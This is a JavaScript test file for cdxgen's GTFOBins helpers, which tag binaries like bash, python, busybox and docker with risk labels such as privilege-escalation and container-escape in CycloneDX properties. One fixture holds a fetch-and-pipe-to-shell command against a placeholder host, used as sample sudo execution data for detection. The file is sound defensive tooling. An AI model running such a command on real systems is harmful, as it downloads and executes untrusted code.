UNPKG

@cyclonedx/cdxgen

Version:

Creates CycloneDX Software Bill of Materials (SBOM) from source or container image

github.com/cdxgen/cdxgen

cdxgen/cdxgen

73 lines (65 loc) 2.88 kB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
import { strict as assert } from "node:assert"; import { describe, it } from "poku"; import { createGtfoBinsProperties, createGtfoBinsPropertiesFromRow, getGtfoBinsMetadata, } from "./gtfobins.js"; describe("gtfobins helpers", () => { it("returns metadata for exact GTFOBins matches", () => { const metadata = getGtfoBinsMetadata("bash"); assert.ok(metadata); assert.strictEqual(metadata.canonicalName, "bash"); assert.ok(metadata.functions.includes("shell")); assert.ok(metadata.contexts.includes("suid")); assert.ok(metadata.riskTags.includes("privilege-escalation")); assert.ok(metadata.riskTags.includes("lateral-movement")); }); it("resolves versioned aliases conservatively", () => { const metadata = getGtfoBinsMetadata("python3.12"); assert.ok(metadata); assert.strictEqual(metadata.canonicalName, "python"); assert.strictEqual(metadata.matchSource, "alias"); assert.ok(metadata.functions.includes("shell")); }); it("resolves symlink targets when the basename is not indexed", () => { const metadata = getGtfoBinsMetadata("sh", "busybox"); assert.ok(metadata); assert.strictEqual(metadata.canonicalName, "busybox"); assert.strictEqual(metadata.matchSource, "symlink"); assert.ok(metadata.riskTags.includes("lateral-movement")); }); it("emits stable CycloneDX properties for matched binaries", () => { const properties = createGtfoBinsProperties("docker"); const propertyMap = Object.fromEntries( properties.map((property) => [property.name, property.value]), ); assert.strictEqual(propertyMap["cdx:gtfobins:matched"], "true"); assert.strictEqual(propertyMap["cdx:gtfobins:name"], "docker"); assert.ok(propertyMap["cdx:gtfobins:functions"].includes("shell")); assert.ok( propertyMap["cdx:gtfobins:riskTags"].includes("container-escape"), ); assert.ok( propertyMap["cdx:gtfobins:reference"].endsWith("/gtfobins/docker/"), ); }); it("derives GTFOBins properties from live Linux osquery rows", () => { const properties = createGtfoBinsPropertiesFromRow("sudo_executions", { path: "/usr/bin/bash", cmdline: "bash -c 'curl https://example.invalid/p.sh | sh'", parent_cmdline: "sudo bash -c payload", }); const propertyMap = Object.fromEntries( properties.map((property) => [property.name, property.value]), ); assert.strictEqual(propertyMap["cdx:gtfobins:matched"], "true"); assert.ok(propertyMap["cdx:gtfobins:names"].includes("bash")); assert.ok(propertyMap["cdx:gtfobins:functions"].includes("shell")); assert.ok( propertyMap["cdx:gtfobins:queryCategory"].includes("sudo_executions"), ); assert.ok(propertyMap["cdx:gtfobins:matchFields"].includes("path")); assert.ok(propertyMap["cdx:gtfobins:matchFields"].includes("cmdline")); }); });